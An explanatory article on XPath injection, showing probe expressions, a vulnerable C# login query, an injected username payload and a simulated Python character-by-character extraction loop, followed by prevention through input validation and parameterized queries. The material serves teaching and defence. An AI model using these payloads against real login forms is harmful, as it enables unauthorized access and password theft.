XPath Injection Attacks and Prevention

What are XPath injection attacks? How do they work? How can they be prevented? Find the answers to these questions and much more in this article.

Updated: 20 Feb, 23 by Antoniy Yushkevych 3 Min

Like SQL injection, XPath injection attacks occur when a website constructs an XPath query for XML data from user-supplied information. Thus, the issues when using XML to store data are quite similar to those with SQL.

XPath injection is a type of attack in which malicious user input is used to gain unauthorized access or to reveal sensitive information, such as the structure and content of an XML document. The attack works because the application places the user's input directly into the query string it builds. Unlike SQL injection, which depends on the SQL dialect of the target database, XPath injection is more portable: XPath is a standardized language, so the same payloads tend to work across implementations.

There are two types of XPath injection attacks: Booleanization and XML Crawling.

  • Booleanization: the attacker learns whether a given XPath expression evaluates to True or False. Suppose the attacker targets a login form: a successful login corresponds to "True" and a failed login attempt to "False". Each query reveals only a small piece of information, such as a single character or a number. To recover a whole string, the attacker tests each position against every character in the class or range of characters the string is expected to belong to.
  • XML Crawling: to learn the structure of the XML document, the attacker may use the following XPath functions:

count(expression)

count(//user/child::node())

This returns the number of child nodes of the matched user elements (in this case 2).

string-length(string)

string-length(//user[position()=1]/child::node()[position()=2])=6

With this query the attacker finds out whether the second child (the password) of the first user node (user 'admin') is 6 characters long.

substring(string, number, number)

substring((//user[position()=1]/child::node()[position()=2]),1,1)="a"

This query confirms (True) or denies (False) that the first character of the password of the user 'admin' is "a".
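The three probes above can be tried against a small sample document. The sketch below assumes the third-party lxml library is installed. The sample document, the password 'secret', and the helper name `probe` are made up for illustration and are not part of the original example.

```python
from lxml import etree  # third-party; assumed to be installed

# Hypothetical sample document: a single user with a login and a password.
# It is written without whitespace so <user> has exactly two child nodes.
SAMPLE_XML = (
    "<users><user><login>admin</login>"
    "<password>secret</password></user></users>"
)

# Path to the second child (the password) of the first user node.
PASSWORD = "//user[position()=1]/child::node()[position()=2]"


def probe(expression: str):
    """Evaluate an XPath 1.0 expression against the sample document."""
    root = etree.fromstring(SAMPLE_XML)
    return root.xpath(expression)


node_count = probe("count(//user/child::node())")
length_is_6 = probe(f"string-length({PASSWORD})=6")
starts_with_a = probe(f'substring(({PASSWORD}),1,1)="a"')
starts_with_s = probe(f'substring(({PASSWORD}),1,1)="s"')

print(node_count, length_is_6, starts_with_a, starts_with_s)
```

With this sample password, the "a" probe is answered with False and the "s" probe with True, which is exactly the one-bit answer the attacker is after.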

If the login form builds its query like this:

C#:

// User input is concatenated directly into the XPath expression.
String FindUser;

FindUser = "//user[login/text()='" + Request["Username"] + "' and " +
      "password/text()='" + Request["Password"] + "']";

Then the attacker could submit the following input:

Username: ' or substring((//user[position()=1]/child::node()[position()=2]),1,1)="a" or ''='
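To see why this input works, it helps to look at the query the application ends up with. The following sketch reproduces only the string concatenation of the vulnerable form; the function name `build_query` and the password value are placeholders chosen for illustration.

```python
def build_query(username: str, password: str) -> str:
    """Concatenate user input into the query, as the vulnerable form does."""
    return (
        "//user[login/text()='" + username + "' and "
        "password/text()='" + password + "']"
    )


# The username payload from the text; the password can be anything.
INJECTED_USERNAME = (
    "' or substring((//user[position()=1]/child::node()[position()=2]),1,1)"
    "=\"a\" or ''='"
)

query = build_query(INJECTED_USERNAME, "anything")
print(query)
```

In the resulting predicate, `and` binds more tightly than `or`, so the expression has the shape `A or B or (C and D)`. The password check only affects the last branch, and the whole predicate is true whenever the injected `substring` test is true.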

The syntax may resemble that of common SQL injection attacks, but the attacker must take into account that XPath does not allow commenting out the rest of the expression. To work around this limitation, the attacker uses OR expressions to neutralize the remaining parts of the query, which would otherwise disrupt the attack.

Because Booleanization reveals so little per query, the number of queries may be very high even for a small XML document (thousands, hundreds of thousands, or more). That is why this attack is not carried out manually. Knowing a few basic XPath functions, the attacker can quickly write an application that rebuilds the structure of the document and fills it with data automatically.
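A minimal sketch of such automation is shown below. It is not a working attack tool: the `oracle` function is a stand-in that simulates the True/False answer of a vulnerable login form and only understands the two probe shapes used here. The secret value, the alphabet, and all function names are assumptions made for illustration.

```python
import re
import string

# Simulated target. In a real attack the answer would come from whether a
# login attempt succeeded; here it is computed from a known secret.
_SECRET = "secret"  # hypothetical password held by the simulated target
TARGET = "//user[position()=1]/child::node()[position()=2]"


def oracle(condition: str) -> bool:
    """Answer True/False for the two supported probe shapes."""
    m = re.fullmatch(r"string-length\(.+\)=(\d+)", condition)
    if m:
        return len(_SECRET) == int(m.group(1))
    m = re.fullmatch(r'substring\(\(.+\),(\d+),1\)="(.)"', condition)
    if m:
        pos = int(m.group(1))
        return _SECRET[pos - 1:pos] == m.group(2)
    raise ValueError("unsupported probe")


def extract(max_length=32, alphabet=string.ascii_lowercase + string.digits):
    """Recover the target string one True/False answer at a time."""
    queries = 0
    length = None
    # Step 1: find the length with string-length().
    for n in range(1, max_length + 1):
        queries += 1
        if oracle(f"string-length({TARGET})={n}"):
            length = n
            break
    if length is None:
        raise RuntimeError("length not found within max_length")
    # Step 2: test every position against every candidate character.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            queries += 1
            if oracle(f'substring(({TARGET}),{pos},1)="{ch}"'):
                recovered += ch
                break
        else:
            recovered += "?"  # character outside the assumed alphabet
    return recovered, queries


recovered, queries = extract()
print(recovered, queries)
```

Even for a six-character value and a 36-character alphabet, the loop needs dozens of queries, which illustrates why the totals grow so quickly for a whole document.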

How to prevent XPath injection attacks:

Because XPath injection is so similar to SQL injection, the main prevention methods are similar too. The same methods also apply to other typical code injection attacks.

  • Input Validation: the developer ensures that the application accepts only legitimate input, for example by checking it against a list of allowed characters.
  • Parameterization: the query is precompiled and user input is passed to it as parameters (variables), instead of being concatenated into the expression itself.
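Both methods can be sketched together. The example below assumes the third-party lxml library, whose compiled `etree.XPath` objects accept XPath variables as keyword arguments. The sample document, the allowlist pattern, and the function name `authenticate` are hypothetical choices, not a recommended policy.

```python
import re
from lxml import etree  # third-party; assumed to be installed

# Hypothetical sample document with a single user.
SAMPLE_XML = (
    "<users><user><login>admin</login>"
    "<password>secret</password></user></users>"
)
ROOT = etree.fromstring(SAMPLE_XML)

# Input validation: an illustrative allowlist for usernames.
ALLOWED_USERNAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Parameterization: the expression is compiled once. $login and $password
# are XPath variables, so their values are bound as plain strings and are
# never parsed as part of the expression.
FIND_USER = etree.XPath(
    "//user[login/text()=$login and password/text()=$password]"
)


def authenticate(username: str, password: str) -> bool:
    """Return True only if a user node matches both values exactly."""
    if not ALLOWED_USERNAME.fullmatch(username):
        return False
    return len(FIND_USER(ROOT, login=username, password=password)) > 0


INJECTION = "' or ''='"

print(authenticate("admin", "secret"))    # correct credentials
print(authenticate("admin", INJECTION))   # payload in the password field
print(authenticate(INJECTION, "secret"))  # payload in the username field
```

Only the username is checked against the allowlist here, since passwords usually need to permit arbitrary characters; the variable binding is what keeps a hostile password from changing the query.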

Antoniy Yushkevych


Master of word when it comes to technology, internet and privacy. I'm also your usual guy that always aims for the best result and takes a skateboard to work. If you need me, you will find me at the office's Counter-Strike championships on Fridays or at a.yushkevych@monovm.com